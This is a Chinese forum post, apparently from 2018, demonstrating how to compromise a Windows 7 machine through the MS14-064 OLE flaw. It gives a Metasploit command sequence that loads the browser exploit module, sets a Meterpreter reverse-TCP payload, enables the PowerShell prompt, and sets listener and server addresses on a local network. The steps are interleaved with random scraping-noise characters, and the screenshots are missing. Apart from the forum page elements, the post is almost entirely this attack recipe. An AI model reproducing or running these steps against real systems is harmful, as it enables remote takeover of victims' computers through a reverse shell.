找回密码
 立即注册
查看: 2633|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

' S* B# @( u/ b) Q c% a$ U 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示# E6 a8 A9 w7 P2 w2 n

. X B! H. p2 D& B' p' V* X

: c5 p! o q/ ~ 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: $ R L2 i+ R. P/ S: d5 `! q( n/ w2 N

- x# W" r6 r/ M. W5 C4 f# }

6 X$ f J8 ~% T' E7 E. K4 r 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp 1 f. @5 S3 a+ U, F6 a

6 W) y" x- d" {1 ^1 f) r

" G8 ~* l0 |0 \* ]! z             set AllowPowershellPrompt true6 |# Q# Y# Y) {5 ~# b- N1 i5 r

7 F$ `* b: y2 ~8 U2 Q7 B

~8 z9 h7 _. s" M0 u% R% K             Set LHOST 192.168.0.109 0 D5 Q7 [0 ^5 S/ u/ S

Q$ a8 G8 S) h A

9 o- b8 l+ m: X; e             set SRVHOST 192.168.0.109 & X$ E3 N4 K/ l8 M o" G

7 ~3 F8 f4 R! P3 x

# Y1 `$ t7 f, k, I% U/ y1 S( c             Set uripath share 1 T5 n0 b1 v& j1 A6 ^

& R1 T& J, e! J' |4 ~0 O

- A' I5 |; K" s' ?             Set srvport 80" e2 m/ z( @' ^6 }1 G' @

0 @' v" o* q& h* d. L, i: o/ _1 m

/ p: N8 s0 P+ B1 }" [; E2 Y$ a  : H) f* z8 S n) v

- G8 w- I) K3 Y! `( T, G" S0 ]

+ i, F$ h) r2 \& D1 D   5 _0 _$ k7 m$ K3 ~# j) z+ x/ J

* C0 r, s p+ Q

' \ v0 Y v2 P& j/ Q0 ^: l   ' i" u: a% M" @: J

3 s( J" C+ d. o' v! G$ H5 G

+ B- R- |4 K6 y1 K8 R$ s   |! u) v" i- I9 W

% a" z+ [( t8 K" h7 K

- G- p: L K6 e- d- \  4 t1 D. g) d, p. F

. W! G2 t1 {, d& ~4 f

, f' B6 k5 a/ h) o5 e 下面我们来访问本地地址如图:+ `) L( P% W& e3 q: U2 l2 i) P

3 [! @8 w1 A6 Q ^- T! d. Y! Z

) T/ F6 F0 F# Q* ?   ) B8 D- u7 H; N7 J

( H5 r, p9 n9 U5 b

9 a9 R0 z+ G# G; O) P. n% d% ?: T   . D1 X$ {, ]8 E Y

4 K1 B; L" q, E. M$ R' h

5 E+ t% W& {' b# [: p B3 W/ d: t3 \; s) z% Q4 {/ b3 B( f/ A

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表